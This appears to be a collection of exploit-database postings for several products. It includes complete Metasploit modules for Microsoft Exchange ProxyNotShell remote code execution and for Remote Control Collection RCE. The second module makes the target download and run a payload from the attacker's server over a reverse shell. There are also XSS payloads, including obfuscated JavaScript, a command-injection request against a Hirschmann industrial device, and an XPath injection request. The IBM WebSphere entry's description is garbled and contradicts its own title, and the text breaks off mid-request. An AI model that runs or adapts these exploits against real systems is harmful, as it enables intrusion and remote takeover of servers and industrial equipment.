<pre><code># Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)<br /># Date: 2022-12-02<br /># Author: Milad karimi<br /># Software Link: https://www.ibm.com/support/pages/6107-websphere-application-server-v61-fix-pack-7-windows<br /># Version: 7.0<br /># Tested on: Windows 10<br /># CVE: 2009-0855<br /><br />1. Description:<br />This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script><br />http://www.example.com/ibm/console/<script>alert('Ex3ptionaL_XSS')</script>.jsp<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::HTTP::Exchange<br /> include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Exchange ProxyNotShell RCE',<br /> 'Description' => %q{<br /> This module chains two vulnerabilities on Microsoft Exchange Server<br /> that, when combined, allow an authenticated attacker to interact with<br /> the Exchange Powershell backend (CVE-2022-41040), where a<br /> deserialization flaw can be leveraged to obtain code execution<br /> (CVE-2022-41082). This exploit only support Exchange Server 2019.<br /><br /> These vulnerabilities were patched in November 2022.<br /> },<br /> 'Author' => [<br /> 'Orange Tsai', # Discovery of ProxyShell SSRF<br /> 'Spencer McIntyre', # Metasploit module<br /> 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis<br /> 'Piotr Bazydło', # Vulnerability analysis<br /> 'Rich Warren', # EEMS bypass via ProxyNotRelay<br /> 'Soroush Dalili' # EEMS bypass<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2022-41040' ], # ssrf<br /> [ 'CVE', '2022-41082' ], # rce<br /> [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],<br /> [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],<br /> [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],<br /> [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]<br /> ],<br /> 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Platform' => ['windows'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'windows',<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :windows_dropper<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'windows',<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :windows_command<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'AKA' => ['ProxyNotShell'],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),<br /> OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),<br /> OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])<br /> ])<br /><br /> register_advanced_options([<br /> OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])<br /> ])<br /> end<br /><br /> def check<br /> @ssrf_email ||= Faker::Internet.email<br /> res = send_http('GET', '/mapi/nspi/')<br /> return CheckCode::Unknown if res.nil?<br /> return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401<br /> return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'<br /><br /> # actually run the powershell cmdlet and see if it works, this will fail if:<br /> # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)<br /> # * the exchange emergency mitigation service M1 rule is in place<br /> return CheckCode::Safe unless execute_powershell('Get-Mailbox')<br /><br /> CheckCode::Vulnerable<br /> rescue Msf::Exploit::Failed => e<br /> CheckCode::Safe(e.to_s)<br /> end<br /><br /> def ibm037(string)<br /> string.encode('IBM037').force_encoding('ASCII-8BIT')<br /> end<br /><br /> def send_http(method, uri, opts = {})<br /> opts[:authentication] = {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'preferred_auth' => 'NTLM'<br /> }<br /><br /> if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'<br /> uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"<br /> opts[:headers] = {<br /> 'X-Up-Devcap-Post-Charset' => 'IBM037',<br /> # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362<br /> 'User-Agent' => "UP #{datastore['UserAgent']}"<br /> }<br /> else<br /> uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"<br /> end<br /><br /> super(method, uri, opts)<br /> end<br /><br /> def exploit<br /> # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not<br /> # work on Exchange Server 2016<br /> if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)<br /> vprint_status("Detected Exchange version: #{version}")<br /> if version < Rex::Version.new('15.2')<br /> fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')<br /> end<br /> end<br /><br /> @ssrf_email ||= Faker::Internet.email<br /><br /> case target['Type']<br /> when :windows_command<br /> vprint_status("Generated payload: #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :windows_dropper<br /> execute_cmdstager({ linemax: 7_500 })<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root<br /> <ResourceDictionary<br /> xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"<br /> xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"<br /> xmlns:System="clr-namespace:System;assembly=mscorlib"<br /> xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><br /> <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start"><br /> <ObjectDataProvider.MethodParameters><br /> <System:String>cmd.exe</System:String><br /> <System:String>/c #{cmd.encode(xml: :text)}</System:String><br /> </ObjectDataProvider.MethodParameters><br /> </ObjectDataProvider><br /> </ResourceDictionary><br /> XAML<br /><br /> identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root<br /> <Obj N="V" RefId="14"><br /> <TN RefId="1"><br /> <T>System.ServiceProcess.ServiceController</T><br /> <T>System.Object</T><br /> </TN><br /> <ToString>Object</ToString><br /> <Props><br /> <S N="Name">Type</S><br /> <Obj N="TargetTypeForDeserialization"><br /> <TN RefId="1"><br /> <T>System.Exception</T><br /> <T>System.Object</T><br /> </TN><br /> <MS><br /> <BA N="SerializationData"><br /> #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}<br /> </BA><br /> </MS><br /> </Obj><br /> </Props><br /> <S><br /> <![CDATA[#{xaml}]]><br /> </S><br /> </Obj><br /> IDENTITY<br /><br /> execute_powershell('Get-Mailbox', args: [<br /> { name: '-Identity', value: identity }<br /> ])<br /> end<br />end<br /><br />class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream<br /> include Msf::Util::DotNetDeserialization<br /><br /> def self.generate<br /> from_values([<br /> Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),<br /> Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(<br /> class_info: Types::General::ClassInfo.new(<br /> obj_id: 1,<br /> name: 'System.UnitySerializationHolder',<br /> member_names: %w[Data UnityType AssemblyName]<br /> ),<br /> member_type_info: Types::General::MemberTypeInfo.new(<br /> binary_type_enums: %i[String Primitive String],<br /> additional_infos: [ 8 ]<br /> ),<br /> member_values: [<br /> Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(<br /> obj_id: 2,<br /> string: 'System.Windows.Markup.XamlReader'<br /> )),<br /> 4,<br /> Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(<br /> obj_id: 3,<br /> string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'<br /> ))<br /> ]<br /> ),<br /> Types::RecordValues::MessageEnd.new<br /> ])<br /> end<br />end<br /></code></pre>
<pre><code>Product: OX App Suite<br />Vendor: OX Software GmbH<br /><br /><br /><br />Internal reference: OXUIB-1654<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16<br />Vendor notification: 2022-05-23<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-31469<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The detection mechanism for "deep links" in E-Mail (e.g. pointing to OX Drive) allows to inject references to arbitrary fake applications. This can be used to request unexpected content, potentially including script code, when those links are used.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.<br /><br />PoC:<br /><a class="deep-link-app" href="https://test/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/apps/themes/default/logo.png?cut=&id=123"><br /><br />Solution:<br />We improved deep-link validation to avoid malicious use.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1678<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3<br />Vendor notification: 2022-05-30<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37307<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Certain content like E-Mail signatures are stored using the "snippets" mechanism. This mechanism contains a weakness that allows to inject seemingly benign HTML content, like XHTML CDATA constructs, that will be sanitized to malicious code. Once such code is in place it can be used for persistent access to the users account.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require access to the same OX App Suite instance or temporary access to the users account.<br /><br />PoC:<br /><![CDATA[<br /><bo<script></script>dy>AA<img src onerror="alert('XSS')">BB</body><br />]]><br /><br />Solution:<br />We improved the sanitizing algorithm to deal with disguised code.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1731<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.3<br />Vendor notification: 2022-06-22<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37308<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Plain-text mail that contains HTML code can be used to inject script code when printing E-Mail.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to make the victim print a malicious E-Mail.<br /><br />PoC:<br />...<br />Content-Type: text/plain<br /><img src onerror="alert('XSS')"><br /><br />Solution:<br />We removed plain-text specific code and use existing sanitization mechanisms for HTML content.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: OXUIB-1732<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4<br />Vendor notification: 2022-06-22<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37309<br />CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)<br /><br />Vulnerability Details:<br />Contacts that do not contain a name but only a e-mail address can be used to inject script code to the "contact picker" component, commonly used to select contacts as recipients or participants.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require access to the same OX App Suite instance or make the victim import malicious contact data.<br /><br />Solution:<br />We now apply proper HTML escaping to all relevant data sets.<br /><br /><br /><br />---<br /><br /><br /><br />Affected product: OX App Suite<br />Internal reference: OXUIB-1785<br />Vulnerability type: Cross-Site Scripting (CWE-80)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: frontend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev37, 7.10.6-rev16, 8.4<br />Vendor notification: 2022-07-20<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37310<br />CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />The metrics and help modules use parts of the URL to determine capabilities. This mechanism suffers from a weakness that allows attackers to use special characters that register malicious capabilities, which will be executed as script code after login.<br /><br />Risk:<br />Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink to its App Suite instance and login. While the "metrics" module is optional, the "help" module is available on all instances.<br /><br />PoC:<br />https://appsuite.example.com/appsuite/#!!&app=io.ox/files&cap=t,(()%3d>{$$%3d%2bf;$f%3d%2b!f;$t%3d$f%2b!f;f$%3d$t|!f;t$%3df$%2b!f;$$f%3dt$|!f;$$t%3d$$f%2b!f;$f$%3d$$t|!f;$t$%3d(""%2b{})[$$f]%2b(""%2b{})[$f]%2b(""%2b[][f])[$f]%2b"f"[f$]%2b"t"[$$]%2b"t"[$f]%2b"t"[$t]%2b(""%2b{})[$$f]%2b"t"[$$]%2b(""%2b{})[$f]%2b"t"[$f];$$$%3d[][$t$][$t$];$$$("$$$('"%2b'\\'%2b$f%2bt$%2b$f%2b'\\'%2b$f%2b$$f%2bt$%2b'\\'%2b$f%2bt$%2b$$f%2b'\\'%2b$f%2b$$t%2b$t%2b'\\'%2b$f%2b$$t%2bt$%2b'('%2b'"'%2b'\\'%2b$f%2bf$%2b$$%2b'\\'%2b$f%2b$t%2bf$%2b'\\'%2b$f%2b$t%2bf$%2b'"'%2b')'%2b"')();")()})()<br /><br />Solution:<br />We sanitized any non-parsable characters from the capabilities input.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1712<br />Vulnerability type: Server-Side Request Forgery (CWE-918)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.4<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37313<br />CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)<br /><br />Vulnerability Details:<br />Deny-lists regarding external connections can be bypassed by using malicious DNS records with more than one A or AAAA response.<br /><br />Risk:<br />Server-initiated requests to external resources (e.g. E-Mail accounts, data feeds) can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies.<br /><br />PoC:<br />Use API calls to setup an external mail account and provide a attacker controlled domain that returns more than one record. Only the first record will be checked against the deny-list, but the second record may also be used afterwards.<br /><br />Solution:<br />We improved the analysis of DNS responses and check all available records against deny-list entries.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1713<br />Vulnerability type: Uncontrolled Resource Consumption (CWE-400)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37312<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)<br /><br />Vulnerability Details:<br />The size of the request body for certain API endpoints were not sufficiently checked for plausible sizes.<br /><br />Risk:<br />Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. Those requests do not require authentication.<br /><br />PoC:<br />Sending a large request body containing a "redirect" URL to the "deferrer" servlet.<br /><br />Solution:<br />We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage.<br /><br /><br /><br />---<br /><br /><br /><br />Internal reference: MWB-1714<br />Vulnerability type: Uncontrolled Resource Consumption (CWE-400)<br />Vulnerable version: 7.10.6 and earlier<br />Vulnerable component: backend<br />Report confidence: Confirmed<br />Solution status: Fixed by Vendor<br />Fixed version: 7.10.5-rev47, 7.10.6-rev22, 8.3<br />Vendor notification: 2022-07-14<br />Solution date: 2022-08-10<br />Public disclosure: 2022-11-24<br />CVE reference: CVE-2022-37311<br />CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)<br /><br />Vulnerability Details:<br />The size of the request parameters for certain API endpoints were not sufficiently checked for plausible sizes.<br /><br />Risk:<br />Requests can be abused to consume large amounts of memory and eventually lead to resource exhaustion. Since such requests are highly asymmetric in terms of resource requirements between the client and the server, they can be scaled to such a degree that the system becomes temporarily unresponsive for all users. Those requests do not require authentication.<br /><br />PoC:<br />Sending a large "location" request parameter to the "redirect" servlet.<br /><br />Solution:<br />We now enforce checks that make sure only requests with plausible size are being processed to avoid uncontrolled resource usage.<br /></code></pre>
<pre><code>CyberDanube Security Research 20221124-0<br />-------------------------------------------------------------------------------<br /> title| Authenticated Command Injection<br /> product| Hirschmann (Belden) BAT-C2<br /> vulnerable version| 8.8.1.0R8<br /> fixed version| 09.13.01.00R04<br /> CVE number| CVE-2022-40282<br /> impact| High<br /> homepage| https://hirschmann.com/<br /> | https://beldensolutions.com<br /> found| 2022-08-01<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"The Technology and Market Leader in Industrial Networking. Hirschmann™<br />develops innovative solutions, which are geared towards its customers’<br />requirements in terms of performance, efficiency and investment<br />reliability."<br /><br />Source: <br />https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Hirschmann BAT-C2 / 8.8.1.0R8<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating <br />system of<br />the device with all implications. If such a device is acting as key <br />device in<br />an industrial network, or controls various critical equipment via serial <br />ports,<br />more extensive damage in the corresponding network can be done by an <br />attacker.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The command "ping 192.168.1.1" was injected to the system by using the<br />following POST request:<br />===============================================================================<br />POST / HTTP/1.1<br />Host: 192.168.3.150<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 <br />Firefox/91.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 75<br />Origin: https://192.168.3.150<br />Authorization: Digest username="admin", realm="config", <br />nonce="4b63bb796252d310", uri="/", algorithm=MD5, <br />response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, <br />cnonce="99c14d39557e691d"<br />Referer: https://192.168.3.150/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/<br />=============================================================================== <br /><br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br />Solution<br />-------------------------------------------------------------------------------<br />Upgrade to firmware version 09.13.01.00R04 or above.<br /><br />A security bulletin for this vulnerability has been published by the vendor:<br />https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends customers from Hirschmann to upgrade the firmware <br />to the<br />latest version available. Furthermore, a full security review by <br />professionals<br />is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden <br />contact<br /> suspects a duplicate. Asked contact for more information.<br />2022-08-18: Belden representative sent more information for clarification.<br /> Highlighted differences between PoCs.<br />2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.<br />2022-08-30: Asked for an update.<br />2022-08-31: Vendor stated, that he will release another security <br />bulletin for<br /> this vulnerability.<br />2022-09-27: Asked for an update.<br />2022-09-28: Vendor is currently testing the new firmware version and has <br />also<br /> been assigned with an CVE number. Draft of security <br />bulletin was<br /> also sent by the security contact.<br />2022-10-12: Asked for an update.<br />2022-10-13: Belden contact stated, that there is no publication date for <br />now as<br /> another patch must be integrated.<br />2022-10-28: Security contact informed us, that the patch will be released<br /> within the next two weeks.<br />2022-11-22: Asked for a status update; Security contact stated, that the<br /> release was delayed due internal reasons.<br />2022-11-23: Vendor sent the final version of the security bulletins. The<br /> release of the new firmware version will be 2022-11-28.<br />2022-11-24: Vendor informed CyberDanube that the release of the bulletin and<br /> the firmware was done on 2022-11-23 by the marketing team.<br /> Coordinated release of security advisory.<br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Exploit::Remote::Udp<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Remote Control Collection RCE',<br /> 'Description' => %q{<br /> This module utilizes the Remote Control Server's, part<br /> of the Remote Control Collection by Steppschuh, protocol<br /> to deploy a payload and run it from the server. This module will only deploy<br /> a payload if the server is set without a password (default).<br /> Tested against 3.1.1.12, current at the time of module writing<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'H4rk3nz0' # edb, discovery<br /> ],<br /> 'References' => [<br /> [ 'URL', 'http://remote-control-collection.com' ],<br /> [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['default', {}],<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp',<br /> 'WfsDelay' => 5,<br /> 'Autocheck' => false<br /> },<br /> 'DisclosureDate' => '2022-09-20',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),<br /> OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\\']),<br /> OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),<br /> ]<br /> )<br /> end<br /><br /> def path<br /> return datastore['PATH'] if datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def special_key_header<br /> "\x7f\x15\x02"<br /> end<br /><br /> def key_header<br /> "\x7f\x15\x01"<br /> end<br /><br /> def windows_key<br /> udp_sock.put("#{special_key_header}\x01\x00\x00\x00\xab") # key up<br /> udp_sock.put("#{special_key_header}\x00\x00\x00\x00\xab") # key down<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def enter_key<br /> udp_sock.put("#{special_key_header}\x01\x00\x00\x00\x42")<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def send_command(command)<br /> command.each_char do |c|<br /> udp_sock.put("#{key_header}#{c}")<br /> sleep(datastore['SLEEP'] / 10)<br /> end<br /> enter_key<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def check<br /> @check_run = true<br /> @check_success = false<br /> upload_file<br /> return Exploit::CheckCode::Vulnerable if @check_success<br /><br /> return Exploit::CheckCode::Safe<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> @check_success = true<br /> if @check_run # send a random file<br /> p = Rex::Text.rand_text_alphanumeric(rand(8..17))<br /> else<br /> p = generate_payload_exe<br /> end<br /> send_response(cli, p)<br /> print_good("Request received, sending #{p.length} bytes")<br /> end<br /><br /> def upload_file<br /> connect_udp<br /> # send a space character to skip any screensaver<br /> udp_sock.put("#{key_header} ")<br /> print_status('Connecting and Sending Windows key')<br /> windows_key<br /><br /> print_status('Opening command prompt')<br /> send_command('cmd.exe')<br /><br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17))<br /> filename << '.exe' unless @check_run<br /> if @service_started.nil?<br /> print_status('Starting up our web service...')<br /> start_service('Path' => '/')<br /> @service_started = true<br /> end<br /> get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"<br /> send_command(get_file)<br /> if @check_run.nil? || @check_run == true<br /> send_command("del #{path}#{filename} && exit")<br /> else<br /> register_file_for_cleanup("#{path}#{filename}")<br /> print_status('Executing payload')<br /> send_command("#{path}#{filename} && exit")<br /> end<br /> disconnect_udp<br /> end<br /><br /> def exploit<br /> @check_run = false<br /> upload_file<br /> end<br />end<br /></code></pre>
<pre><code>## Title: concretecms-9.1.3 Xpath injection<br />## Author: nu11secur1ty<br />## Date: 11.28.2022<br />## Vendor: https://www.concretecms.org/<br />## Software: https://www.concretecms.org/download<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3<br /><br />## Description:<br />The URL path folder `3` appears to be vulnerable to XPath injection attacks.<br />The test payload 50539478' or 4591=4591-- was submitted in the URL<br />path folder `3`, and an XPath error message was returned.<br />The attacker can flood with requests the system by using this<br />vulnerability to untilted he receives the actual paths of the all<br />content of this system which content is stored on some internal or<br />external server.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploits:<br />00:<br />```GET<br />GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br 